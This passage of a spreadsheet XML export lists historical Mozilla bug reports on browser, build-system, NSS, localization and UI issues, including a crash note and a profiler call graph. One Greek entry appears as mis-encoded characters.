Users with JS disabled will not have their bundle installs counted but it's a rare enough case that it shouldn't matter.</t>
  </si>
  <si>
    <t>CORE-389636</t>
  </si>
  <si>
    <t xml:space="preserve">[FIX]ASSERTION: aDocument must be current doc of aParent and more with cloned </t>
  </si>
  <si>
    <t>Created attachment 273930
testcase
Loading the testcase triggers two assertions I haven't seen before:
###!!! ASSERTION: aDocument must be current doc of aParent: '!aParent || aDocument == aParent-&gt;GetCurrentDoc()' 
file mozilla/content/base/src/nsGenericElement.cpp line 1931
###!!! ASSERTION: Parent in document but flagged as forcing XBL: '!aParent || !aDocument || !aParent-&gt;HasFlag(NODE_FORCE_XBL_BINDINGS)' 
file mozilla/content/base/src/nsGenericElement.cpp line 1944
It also triggers some assertions I have seen elsewhere:
###!!! ASSERTION: element not in the document: 'doc' 
file mozilla/layout/base/nsChildIterator.cpp line 62
(bug 335896?)
###!!! ASSERTION: Shallow unbind won't clear document and binding parent on kids!: 'aDeep || (!GetCurrentDoc() &amp;&amp; !GetBindingParent())' 
file mozilla/content/base/src/nsGenericElement.cpp line 2082
(bug 360078 comment 8?)</t>
  </si>
  <si>
    <t>CORE-348511</t>
  </si>
  <si>
    <t>XSLTProcessor.setParameter(f3ckarray) causes heap trouble</t>
  </si>
  <si>
    <t>XSLTProcessor.setParameter(f3ckarray) causes heap trouble 
probably either heap overflow or wild pointers.
on trunk 2.0 and 1.5
*** glibc detected *** free(): invalid next size (fast): 0x08dd6ef8 ***</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-298455</t>
  </si>
  <si>
    <t>pkg.m4 is too conservative about pkg-config --libs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U NetBSD i386 en-US rv:1.8b2) Gecko/20050620 Firefox/1.0+
Build Identifier: Mozilla/5.0 (X11 U NetBSD i386 en-US rv:1.8b2) Gecko/20050620 Firefox/1.0+
pkg.m4 builds up LIBS compile variables from --libs-only-L and --libs-only-l so
as to avoid possible mishaps such as getting -Wl--export-dynamic. This approach
is too conservative as it means that it also gets rid of necessary flags such
as -Wl-R/some/path. The patch I will attach once I find the right place on this
web front end takes the opposite approach: if you don't want
-Wl--export-dynamic then remove it.
The actually problem came about when xpidl wouldn't run so it was impossible to
compile firefox. The reason was that xpidl couldn't find libIDL-2.so was because
the necessary -Wl-R/usr/local/lib in
% pkg-config --libs libIDL-2.0
-Wl-R/usr/local/lib -L/usr/local/lib -lIDL-2 -lglib-2.0 -lintl  
was removed by pkg.m4 while building up LIBIDL_LIBS.
Reproducible: Always</t>
  </si>
  <si>
    <t>pw-fb</t>
  </si>
  <si>
    <t>PANCAKE_GRAVEYARD-751518</t>
  </si>
  <si>
    <t>Native iOS Wrapper</t>
  </si>
  <si>
    <t>PANCAKE_GRAVEYARD</t>
  </si>
  <si>
    <t>Websites: Some pages won't stop loading Facebook login to post comments prompt in Pancake</t>
  </si>
  <si>
    <t>Old article but was shared and retweeted recently: http://www.inc.com/magazine/20070201/features-firefox-sidebar.html
When I visit that page in Pancake it loads but then gets replaced by a facebook login to post comments prompt a second or so later.  This page works fine in Firefox desktop and Safari on iPad.</t>
  </si>
  <si>
    <t>CORE-122892</t>
  </si>
  <si>
    <t>nsLocalFile::Clone should preserve stat info</t>
  </si>
  <si>
    <t>A C++ copy construction of this is all that really is needed.  This will avoid
extra stat()'s when they are clearly not needed.</t>
  </si>
  <si>
    <t>CORE-245417</t>
  </si>
  <si>
    <t>images with css float flash/jump in upper left corner of frame as they are loaded</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040514
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040514
Recently reworked page to fully exploit css and div/span layout.
images with css float flash in upper left corner of frame as they are loaded.
This happens with both the HTML and the xml with stylesheet version.
I have 0 cache size setting
Reproducible: Always
Steps to Reproduce:
1. draw area on map
2. click search
3. results page loads
4. images will flash in upper left corner as they are loaded.
Actual Results:  
images will flash in upper left corner as they are loaded.
Expected Results:  
images should not appear in upper left corner of frame then be redrawn.
0 cache size.
Attaching html rendering xml xml stylesheet css.
50 thumbnails should load off website.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-223556</t>
  </si>
  <si>
    <t>citibank.be - Bad Javascript code - wrong case on getElementById</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20031007
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20031007
This page contains FAQ. Clicking on a question does nothing. An error is
reported on Javascript console : 
Error: document.getElementByID is not a function
Source File: http://www.citibank.be/js/faq.js
Line: 71
Reproducible: Always
Steps to Reproduce:
1. Goto http://www.citibank.be/ebank/2_3_1.asp
2. Click on Who has access to Citibank Online Internet Banking?
Actual Results:  
Nothing.
Expected Results:  
Display additional information on the right.</t>
  </si>
  <si>
    <t>michel.poleur</t>
  </si>
  <si>
    <t>NSPR-9907</t>
  </si>
  <si>
    <t>NSPR should not define symbols in pthreads namespace</t>
  </si>
  <si>
    <t>NSPR currently defines symbols with the PTHREAD prefix this make code
maintenance error-prone and adds to confusion.</t>
  </si>
  <si>
    <t>CORE-237956</t>
  </si>
  <si>
    <t>Gnopernicus can't report the content of a StaticText while the cursor is at the tail.</t>
  </si>
  <si>
    <t>Discription:
When the cursor is at the tail of text.
Gnopernicus can't report the content of it.</t>
  </si>
  <si>
    <t>SEAMONKEY-201439</t>
  </si>
  <si>
    <t>Opening several tabs makes the side border of one or more tabs disappear.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i586 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (X11 U Linux i586 en-US rv:1.3) Gecko/20030312
When I open several tabs often four the tab border located in the center
disappears.  It stays gone even when tabs are switched just displaying a slight
bump in the center.  This is hard to describe.  I have also seen it work on
Windows 98 Mozilla 1.01 (I believe).  Often with more than four or five tabs
(enought o overflow the screen making the tabs shrink to less than their
defautl size) it makes more than one intratab border disappear.
Reproducible: Always
Steps to Reproduce:
1.Start Mozilla
2.Press control-T several times until there are enough tabs that they have to
be shrunk.
3.Observe the borders between the tabs.  If none of the borders have
disappeared open a few more tabs until you see it.
Actual Results:  
One (or more) of the intratab borders disappeared into the primidorial grey.
Expected Results:  
All the tabs should have been separated from each other by crisp borders.
This bug occurs within the default theme also with 1.4 alpha.
This bug causes nothing but a cosmetic blemish.  There is no effect on
functionality as far as I can tell.</t>
  </si>
  <si>
    <t>torii9</t>
  </si>
  <si>
    <t>MOZILLA.ORG-380972</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Kev Needham </t>
  </si>
  <si>
    <t>Per bug 379783 please provide me with modify access to /mozilla/www/mozilla.com/trunk/en-US/add-ons/ebay/ so I can make required changes to eBay companion files and commit for syncing.
Thanks much.</t>
  </si>
  <si>
    <t>CORE-429781</t>
  </si>
  <si>
    <t>Update XMLHttpRequest blocked header list</t>
  </si>
  <si>
    <t>The XMLHttpRequest spec  was recently updated to block more dangerous headers.  We should update our implementation to block them as well.
I've attached a first pass at implementing this but I haven't had a chance to test the patch yet.  Is there an existing test suite for the blocked header list?</t>
  </si>
  <si>
    <t>abarth-mozilla</t>
  </si>
  <si>
    <t>MARKETING-977477</t>
  </si>
  <si>
    <t>[Australis] Moz.org homepage tabzilla design</t>
  </si>
  <si>
    <t>Placeholder for a Tabzilla design for the Australis launch. Should use design and messaging of overall launch campaign. More info forthcoming as campaign creative direction and messaging is finalized. 
Final deliverable is a design for the Tabzilla promo spot on the mozilla.org homepage.</t>
  </si>
  <si>
    <t>enoonan</t>
  </si>
  <si>
    <t>AUS_GRAVEYARD-327140</t>
  </si>
  <si>
    <t>Systems</t>
  </si>
  <si>
    <t>AUS_GRAVEYARD</t>
  </si>
  <si>
    <t>Partial update generation failing</t>
  </si>
  <si>
    <t>From the 20060214 nightly the updates are only 54 bytes in size and seem to produce no changes - the BuildID/UA does not update. The update applies cleanly though (Update History is correct and last-update.log indcates no error).
This affects all nightly updates.
Trunk Linux http://mozilla.osuosl.org/pub/mozilla.org/firefox/nightly/2006-02-13-04-trunk/
Trunk Mac
http://mozilla.osuosl.org/pub/mozilla.org/firefox/nightly/2006-02-13-05-trunk/
Trunk Win32
http://mozilla.osuosl.org/pub/mozilla.org/firefox/nightly/2006-02-13-06-trunk/
1.8 branch Linux &amp; Win32
http://mozilla.osuosl.org/pub/mozilla.org/firefox/nightly/2006-02-13-05-mozilla1.8/
1.8 branch Mac
http://mozilla.osuosl.org/pub/mozilla.org/firefox/nightly/2006-02-13-04-mozilla1.8/
1.8.0 branch linux
http://mozilla.osuosl.org/pub/mozilla.org/firefox/nightly/2006-02-13-05-mozilla1.8.0/
Fallout from bug 326465 ?</t>
  </si>
  <si>
    <t>FIREFOX-355559</t>
  </si>
  <si>
    <t>[USABILITY] Tab [x] buttons appearing</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1b2) Gecko/20060601 BonEcho/2.0b2 (Ubuntu-edgy)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1b2) Gecko/20060601 BonEcho/2.0b2 (Ubuntu-edgy)
This is totally just a usability issue IMO so if you disagree then I guess feel free to mark as NOTABUG or whatever.
But when I have fewer than 7 tabs open Firefox draws an [x] button the active tab but not on the other tabs but if I mouseover another tab then the [x] button appears.  The problem is that when I'm moving my mouse to click on another tab I'm aiming for anywhere on the tab and suddenly I click the tab before I realize that an [x] button has appeared and I end up closing the tab instead of switching to it.
Personally I don't really like having an [x] on every tab.. but I feel like if you're going to do that it should always be there and not just on the mouseover.  I'd rather see it have an [x] on the active tab and allow you to right-click other tabs to close them without switching to them.  But that's just my opinion.
Reproducible: Always</t>
  </si>
  <si>
    <t>NSS-406120</t>
  </si>
  <si>
    <t>Allow application to specify OCSP timeout</t>
  </si>
  <si>
    <t>NSS currently uses a hardcoded 60 seconds timeout value for OCSP requests.
See mozilla/security/nss/lib/certhigh/ocsp.c :
    if ((*hcv1-&gt;createFcn)(
            pServerSession
            http
            path
            POST
            PR_TicksPerSecond() * 60
            &amp;pRequestSession) != SECSuccess) {
        PORT_SetError(SEC_ERROR_OCSP_SERVER_ERROR)
        goto loser
    }
This can cause problems in WIFI environments where the server cert used on a secure signup page triggers the application to contact a blocked OCSP server (blocked because not yet paid).
Clearly this is a misconfiguration of a WIFI hotspot but that's what seems to happen in real life.
In bug 404059 it has been proposed to lower the timeout to 10 seconds.
Right now the application is unable to control the timeout that NSS will request for OCSP requests.
This bug proposes a new NSS API function that allows to set the timeout value.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-217518</t>
  </si>
  <si>
    <t>Mozilla sends too long IMAP STORE commands</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686) Gecko/20030714 Galeon/1.3.7 Debian/1.3.7.20030813-1
Build Identifier: Mozilla/5.0 (X11 U Linux i686) Gecko/20030714 Galeon/1.3.7 Debian/1.3.7.20030813-1
RFC2683 recommands that clients never send commands lines longer than 1000
bytes and servers never accept commands longer than 8000 bytes. Mozilla however
sends even longer STORE commands sometimes.
I believe it happens at least when trying to expunge a lot of mails. Mozilla
first marks all of them as deleted I guess? And sounds like it doesn't optimize
the messageset too well either.
Anyway you should make sure it splits the operations into 1000 bytes or less.
Most servers do limit the maximum line length and Mozilla breaks with them with
large mailboxes.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>tss</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-424505</t>
  </si>
  <si>
    <t>Need nagios string check for Firefox Help page on SUMO</t>
  </si>
  <si>
    <t>Bug 423486 is proposing to link to http://support.mozilla.com/en-US/kb/Firefox+Help from the Help menu in Firefox in place of the in-product Help Viewer.  If that happens we need string checks in nagios for that page to ensure it's always available.  We had a corrupted cache this evening and it was serving blank pages.</t>
  </si>
  <si>
    <t>CORE-345069</t>
  </si>
  <si>
    <t>[FIX] imgILoader::loadImageWithChannel docs make no sense</t>
  </si>
  <si>
    <t>In particular there's no URI in sight.</t>
  </si>
  <si>
    <t>CORE-120504</t>
  </si>
  <si>
    <t>QI'ing an nsGenericElement based element to nsIDOM* ends up in the binding manager code...</t>
  </si>
  <si>
    <t>When QI'ing an nsGenericElement based element to nsIDOM* we end up asking the
binding manager if there's a binding available that implements the nsIDOM*
interface before we check if the element itself implements that interface. Patch
coming up.</t>
  </si>
  <si>
    <t>CORE-120866</t>
  </si>
  <si>
    <t>AutoConfig: Missing support in the autoconfig JS context to access PR_GetEnv()</t>
  </si>
  <si>
    <t>Extracted from Brian Nesse's email:  
There is a getenv call in the 4.x preferences JS 
context. It is mapped into an NSPR function PR_GetEnv()  that 
retrieves environment variables on Windows &amp; Unix and pulls data from an 
array on the Mac.
The underlying NSPR functionality does appear to exist in mozilla. There 
is no support in preferences to access it however. It should be possible to add
this support into the AutoConfig JS context.</t>
  </si>
  <si>
    <t>margaret.chan</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-279662</t>
  </si>
  <si>
    <t>xpi packaging for xforms</t>
  </si>
  <si>
    <t>CORE-290770</t>
  </si>
  <si>
    <t>SVG frames not dealing with borders properly</t>
  </si>
  <si>
    <t>There is some commented out code dealing with borders in nsSVGOuterSVGFrame's
Paint.  This needs to be fixed along with GetFrameForPoint and possibly the
width/height used for relative sizing of child frames.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-392717</t>
  </si>
  <si>
    <t>Add Netscape 9.0b3 to the list of allowed versions in the version checker</t>
  </si>
  <si>
    <t>Bug 389618 added 9.0b1 and 9.0b2. Filing a bug to put 9.0b3 on the radar. Also it would be nice if  was updated with a list of recognized Netscape versions.
Assigning to morgamic as he added the previous versions.</t>
  </si>
  <si>
    <t>NSS-77662</t>
  </si>
  <si>
    <t>change secvfy to take signature at the beginning</t>
  </si>
  <si>
    <t>JSS hacked secvfy to take the signature when creating the context instead of
at  the end of the operation. This requires changing the context struct to
include the signature. The code to do this already exists and works in
mozilla/security/jss/org/mozilla/jss/hclhacks/secvfy.c.</t>
  </si>
  <si>
    <t>SEAMONKEY-500205</t>
  </si>
  <si>
    <t>L10n repack fails if ChatZilla or venkman are missing from build</t>
  </si>
  <si>
    <t>I did the first bunch of release automation tests with ChatZilla excluded as I didn't have a staging CVS and didn't want to tag any live repo. What I did find out with that was that we fail L10n repackaging when either ChatZilla or venkman are configured off.
This is not hard to fix so I think we should just add that flexibility to our build system.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-602940</t>
  </si>
  <si>
    <t>Narcissus</t>
  </si>
  <si>
    <t>remove narcissus from hg tree</t>
  </si>
  <si>
    <t>We've created a new independent home for Narcissus on GitHub:
    http://github.com/mozilla/narcissus
So we can now remove Narcissus from the mozilla-central and tracemonkey trees. This includes:
    * js/narcissus
    * js/shell/njs
    * bits of js/src/shell/Makefile.in
If all goes well I don't think it should require a clobbering build but it will require people to re-run autoconf.
Dave</t>
  </si>
  <si>
    <t>CORE-491415</t>
  </si>
  <si>
    <t>[FIX]nsLineBox doesn't initialize mAscent until someone calls SetAscent</t>
  </si>
  <si>
    <t>Fix coming up.  This caused the orange when interruptible reflow landed.</t>
  </si>
  <si>
    <t>CORE-6270</t>
  </si>
  <si>
    <t>TRACKING: mouse event handling in tables</t>
  </si>
  <si>
    <t>using 5/11 build of apprunner.
The following functionality needs to be implemented for editor
context menu hookup(except tables)
resize hooks
mouseMove event hooks</t>
  </si>
  <si>
    <t>mjudge</t>
  </si>
  <si>
    <t>sujay</t>
  </si>
  <si>
    <t>CORE-363200</t>
  </si>
  <si>
    <t>Calling setCaretOffset should scroll the text into view if it is off screen</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061208 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061208 Minefield/3.0a1
The accessible text implementation provides a setCaretOffset method to set the caret position.  For Firefox I believe this should help an assistive technology to write its own caret navigation mechanism.  For the most part (modulo some other bugs already logged) this method kind of works.  However I notice that when setting the caret position to something off the screen the page does not scroll the caret position into view.  It would be great if the Firefox accessibility implementation could provide this.
Reproducible: Always</t>
  </si>
  <si>
    <t>TOOLKIT-466086</t>
  </si>
  <si>
    <t>Remove unused safebrowsing phishing EULA</t>
  </si>
  <si>
    <t>Created attachment 349340
Patch v.1
Searching for EULA in the tree shows a number of results related to the anti-phishing code. After poking around I can't find any place that the code / EULA is actually shown. It looks like bug 388652 removed the code that invoked the EULA display when switching safebrowsing providers or type.
Found while looking for any remaining post-bug 456439 cleanup.</t>
  </si>
  <si>
    <t>BUGZILLA-346343</t>
  </si>
  <si>
    <t>Clean up all of checksetup prior to localconfig code</t>
  </si>
  <si>
    <t>I'm about to dive into the localconfig code in checksetup.pl and put it in a module but before I do that I want to clean up all the code before it in checksetup and get it exactly the way I'd like it to be.</t>
  </si>
  <si>
    <t>CORE-330660</t>
  </si>
  <si>
    <t>Template builder refuses to propagate assertions</t>
  </si>
  <si>
    <t>CORE-342439</t>
  </si>
  <si>
    <t>printing certain urls (google groups and maps) from print preview shows the style/meta tags on paper</t>
  </si>
  <si>
    <t>[printing] printing (a google pages) shows the style tag on paper (but not in preview)
try it with http://groups.google.com/group/mozilla.dev.apps.firefox/msg/46e9754733d4a436
I have seen this on google maps too.  I'll get a test case
see attached pdf.
I'm using Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1a3) Gecko/20060620 BonEcho/2.0a3</t>
  </si>
  <si>
    <t>CALENDAR-319790</t>
  </si>
  <si>
    <t>add a way to calculate the weeknumber given a calIDateTime</t>
  </si>
  <si>
    <t>We need a way to calculate the weeknumber from a given date. The code is currently in dateUtils.js but that isn't easily accessible from xbl widgets or from possible c++ code. So it should be added to calIDateTime (or maybe we should add a calIDateTimeHelpers.idl for things like this somewhere in the future)</t>
  </si>
  <si>
    <t>CORE-370802</t>
  </si>
  <si>
    <t>nsIPermissionManager: Add ability for exact hostname testing</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/seamonkey/source/netwerk/base/public/nsIPermissionManager.idl
As of today this interface is shared to manager permissions for installing addons allowing cookie sites and blocking images.
I would like to reuse this and introduce a new category of permissions related to certificates.
However during my testing I noticed that a stored permission for abc.com will also be used for www.abc.com. While this might be somewhat tolerable I'm concerned about people entering com because this grants permission for all hosts under the com toplevel domain. I would like to avoid this with the new category.
So here is my proposal:
Extend the current nsIPermissionManager.idl interface (luckily not frozen).
Introduce a new function similar to TestPermission which requires an exact hostname match.
Existing image/cookie/addon permission checking code will function unchanged but the new code I'm adding related to certs would use the new TestExactPermission function.</t>
  </si>
  <si>
    <t>SEAMONKEY-460756</t>
  </si>
  <si>
    <t>Put the search box in the main toolbar of bookmarks manager</t>
  </si>
  <si>
    <t>I think it'd look better if we had the search box in the main toolbar and removed the secondary toolbar. The current look is not so nice (at least on mac - the search box is stretched across the whole toolbar) and it feels a bit like an overkill to have a toolbar for just a search box.</t>
  </si>
  <si>
    <t>CORE-323299</t>
  </si>
  <si>
    <t>Simplify nsExpatDriver</t>
  </si>
  <si>
    <t>I've found a way to simplify nsExpatDriver a bit. The key change is to make the scanner always point to the position that Expat will start parsing when we call it. I've also found a way to avoid the loop to look for the beginning of the last line (so we can store it for error reporting) by using XML_GetCurrentColumnNumber.
I've run this through a couple of tests (XSLT testsuite testcase from bug 275564 ...) and everything seems to work fine. Of course there are tricky timing issues that might influence this code but I think I got everything working correctly.
The patch includes one change to Expat code that I'll try integrating upstream.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-465695</t>
  </si>
  <si>
    <t>el / Greek</t>
  </si>
  <si>
    <t>Greek Warning page (Page load error) contains spelling error</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 el rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 el rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (.NET CLR 3.5.30729)
In the page that comes up when a web page can not load (Î£Ï†Î¬Î»Î¼Î± Ï†ÏŒÏÏ„Ï‰ÏƒÎ·Ï‚ ÏƒÎµÎ»Î¯Î´Î±Ï‚) in the last line the word Ï€ÏÎ¿ÏƒÏ€Î±Î¸ÎµÎ¯ÏƒÏ„Îµ should definitely be Ï€ÏÎ¿ÏƒÏ€Î±Î¸Î®ÏƒÏ„Îµ as it is not in passive voice. Also there are two dots in the end of the sentence where there should be only one of them. 
Reproducible: Always
Steps to Reproduce:
1.Open the page load error page 
2.Look at the last sentence
Actual Results:  
ÎŸ Ï€ÎµÏÎ¹Î·Î³Î·Ï„Î®Ï‚ Î´ÎµÎ½ ÏƒÏ…Î½Î´Î­Î¸Î·ÎºÎµ Î¼Îµ Ï„Î·Î½ Î¹ÏƒÏ„Î¿ÏƒÎµÎ»Î¯Î´Î± Î»ÏŒÎ³Ï‰ Ï…Ï€Î­ÏÎ²Î±ÏƒÎ·Ï‚ Ï„Î¿Ï… Ï‡ÏÎ¿Î½Î¹ÎºÎ¿Ï Î¿ÏÎ¯Î¿Ï…. Î Î¹Î¸Î±Î½ÏŒÎ½ Î½Î± Ï…Ï€Î¬ÏÏ‡Î¿Ï…Î½ Ï€ÏÎ¿Î²Î»Î®Î¼Î±Ï„Î± ÎºÎ¯Î½Î·ÏƒÎ·Ï‚ ÏƒÏ„Î¿ Î´Î¯ÎºÏ„Ï…Î¿. Î ÎµÏÎ¹Î¼Î­Î½ÎµÏ„Îµ Î»Î¯Î³Î¿ ÎºÎ±Î¹ Ï€ÏÎ¿ÏƒÏ€Î±Î¸ÎµÎ¯ÏƒÏ„Îµ Î¾Î±Î½Î¬..
Expected Results:  
ÎŸ Ï€ÎµÏÎ¹Î·Î³Î·Ï„Î®Ï‚ Î´ÎµÎ½ ÏƒÏ…Î½Î´Î­Î¸Î·ÎºÎµ Î¼Îµ Ï„Î·Î½ Î¹ÏƒÏ„Î¿ÏƒÎµÎ»Î¯Î´Î± Î»ÏŒÎ³Ï‰ Ï…Ï€Î­ÏÎ²Î±ÏƒÎ·Ï‚ Ï„Î¿Ï… Ï‡ÏÎ¿Î½Î¹ÎºÎ¿Ï Î¿ÏÎ¯Î¿Ï…. Î Î¹Î¸Î±Î½ÏŒÎ½ Î½Î± Ï…Ï€Î¬ÏÏ‡Î¿Ï…Î½ Ï€ÏÎ¿Î²Î»Î®Î¼Î±Ï„Î± ÎºÎ¯Î½Î·ÏƒÎ·Ï‚ ÏƒÏ„Î¿ Î´Î¯ÎºÏ„Ï…Î¿. Î ÎµÏÎ¹Î¼Î­Î½ÎµÏ„Îµ Î»Î¯Î³Î¿ ÎºÎ±Î¹ Ï€ÏÎ¿ÏƒÏ€Î±Î¸Î®ÏƒÏ„Îµ Î¾Î±Î½Î¬.
You can even evaluate this against the Greek dictionary used for Firefox. (Well this dictionary doesn't even contain Firefox :P)</t>
  </si>
  <si>
    <t>larjohn</t>
  </si>
  <si>
    <t>CORE-114040</t>
  </si>
  <si>
    <t>QNX isn't X11 [useragent string needs to be corrected for QNX]</t>
  </si>
  <si>
    <t>This is an interim bug+fix.
The QNX useragent is dead wrong in the average case. What's of course most confusing is that it /could/ be right.
related future bugs:
1. move useragent out of http
2. rewrite configure to positively define some MOZ...X11 when we're building against X11 [currently Win and OS/2 definitely do not define NO_X11] so that the logic here can be cleaned up to correctly handle X11 vs. World.
this block:
+#elif defined(NO_X11)
+    ?
is just a placeholder to remind people that there could be other things that aren't X11.
The XP_UNIX code which we currently have can be wrong in other cases too if someone ever built moz-x11(gtk/qt/xlib/...) on BeOS MacOSX Windows or OS/2 [OS/2 mostly because they trumped the logic just as my patch for this does...]</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-428189</t>
  </si>
  <si>
    <t>mn / Mongolian</t>
  </si>
  <si>
    <t>[mn] Getting started page for Firefox 3 potential link changes</t>
  </si>
  <si>
    <t>SEAMONKEY-206464</t>
  </si>
  <si>
    <t>Search Sidebar does not remember chosen search engine in advanced mode</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.4b) Gecko/20030507
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.4b) Gecko/20030507
The Search sidebar does not remember chosen search engine in advanced search
mode (the mode in which you can divide search engines into categories and
choose more than one search engine to do the search). It worked in Mozilla rv:
1.3 (Linux/X11). 
Reproducible: Always
Steps to Reproduce:
1.Change search mode to advanced.
2.Choose one category and select one of engines (check one of checkboxes)
3.Select other category or select other sidebar
4.Go back to the previous category/the search sidebar
Actual Results:  
All checkboxes are unchecked. No search engine is chosen.
Expected Results:  
The selection of search engines in categories should be persistent (as it were
in Mozila rv. 1.3).</t>
  </si>
  <si>
    <t>jnareb</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-523564</t>
  </si>
  <si>
    <t>[cs] Translation corrections for SeaMonkey 2/2.1</t>
  </si>
  <si>
    <t>List of corrections for SeaMonkey 2. Corrections will be written in Czech because it's better for some contributors.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-178169</t>
  </si>
  <si>
    <t>High CPU usage on launch after crash (deleting disk  cache)</t>
  </si>
  <si>
    <t>This is build 2002101104 of Chimera running 10.2.1 on a PowerBookG4-400/512MB ram.
Periodically (perhaps once out of every 3-4 launches seems to be more common
when relaunching after crashes) Chimera begins to take ~60-70% of the CPU for
several minutes. It also sounds like it's beginning to grind the disk. Chimera
itself is unresponsive when this happens (spinning beachball) but the rest of
the machine is fine (though slow). Note that at this point I only have the
blank first page up (I have no homepage so on launch Chimera typically shows a
blank page).
I have a sample (done with sample 1447 10) of Chimera in this state:
Analysis of sampling pid 1447 every 10 milliseconds
Call graph:
    1000 Thread_0d03
      1000 start
        1000 _start
          1000 NSApplicationMain
            1000 -[NSApplication run]
              1000 -[NSApplication sendEvent:]
                1000 -[BrowserWindow sendEvent:]
                  1000 -[NSWindow sendEvent:]
                    1000 -[NSTextView keyDown:]
                      1000 -[NSView interpretKeyEvents:]
                        1000 -[NSTSMInputContext interpretKeyEvents:]
                          1000
-[NSKeyBindingManager(NSKeyBindingManager_MultiClients)
interpretEventAsCommand:forClient:]
                            1000 -[NSTextView doCommandBySelector:]
                              1000 -[NSTextView(NSPrivate) _giveUpFirstResponder:]
                                1000 _CFNotificationCenterPostLocalNotification
                                  1000 _postNotification
                                    1000 _nsNotificationCenterCallBack
                                      1000 -[NSTextField textDidEndEditing:]
                                        1000 -[NSControl sendAction:to:]
                                          1000 -[NSApplication sendAction:to:from:]
                                            1000 -[BrowserWindowController
goToLocationFromToolbarURLField:]
                                              1000 -[CHBrowserView
loadURI:referrer:flags:]
                                                1000
nsDocShell::LoadURI(unsigned short const* unsigned nsIURI* nsIInputStream*
nsIInputStream*)
                                                  1000
nsDocShell::LoadURI(nsIURI* nsIDocShellLoadInfo* unsigned int)
                                                    1000
nsDocShell::InternalLoad(nsIURI* nsIURI* nsISupports* int unsigned short
const* nsIInputStream* nsIInputStream* unsigned nsISHEntry* int
nsIDocShell** nsIRequest**)
                                                      1000
nsDocShell::DoURILoad(nsIURI* nsIURI* nsISupports* nsIInputStream*
nsIInputStream* int nsIDocShell** nsIRequest**)
                                                        1000
nsDocShell::DoChannelLoad(nsIChannel* nsIURILoader*)
                                                          1000
nsURILoader::OpenURIVia(nsIChannel* int nsISupports* unsigned)
                                                            1000
nsDocumentOpenInfo::Open(nsIChannel* int nsISupports*)
                                                              1000
nsHttpChannel::AsyncOpen(nsIStreamListener* nsISupports*)
                                                                1000
nsHttpChannel::Connect(int)
                                                                  1000
nsHttpChannel::OpenCacheEntry(int*)
                                                                    1000
nsCacheService::OpenCacheEntry(nsCacheSession* char const* int int
nsICacheListener* nsICacheEntryDescriptor**)
                                                                      1000
nsCacheService::ProcessRequest(nsCacheRequest* int nsICacheEntryDescriptor**)
                                                                        1000
nsCacheService::ActivateEntry(nsCacheRequest* nsCacheEntry**)
                                                                          1000
nsCacheService::SearchCacheDevices(nsCString* int)
                                                                            1000
nsCacheService::CreateDiskDevice()
1000 nsDiskCacheDevice::Init()
1000 nsDiskCacheDevice::InitializeCacheDirectory()
  1000 nsLocalFile::Remove(int)
    1000 FSDeleteContainer
      1000 FSDeleteContainerContents
        1000 FSDeleteContainerLevel
          958 FSGetCatalogInfoBulk
            958 PBGetCatalogInfoBulkSync
              938 GetIndexedDirectoryItem(VolumeInfo* unsigned long unsigned
long unsigned long char* unsigned char*)
                938 DCBlock_Create(VolumeInfo const* unsigned long DCBlock**)
                  920 DCBlock_BuildContents(int DCBlock*)
                    770 getdirentries_exhaustive(int unsigned long*)
                      358 getdirentries
                        358 getdirentries [STACK TOP]
                      296 realloc
                        294 malloc_zone_realloc
                          294 szone_realloc
                            250 memmove
                              250 memmove [STACK TOP]
                            23 szone_malloc
                              22 large_and_huge_malloc
                                21 allocate_pages
                                  21 vm_allocate
                                    20 mach_msg
                                      20 mach_msg_trap
                                        20 mach_msg_trap [STACK TOP]
                                    1 mig_get_reply_port
                                      1 __gcc_bcmp
                                        1 __gcc_bcmp [STACK TOP]
                                1 spin_unlock
                                  1 spin_unlock [STACK TOP]
                              1 szone_malloc [STACK TOP]
                            19 szone_free
                              12 deallocate_pages
                                11 vm_deallocate
                                  11 mach_msg
                                    11 mach_msg_trap
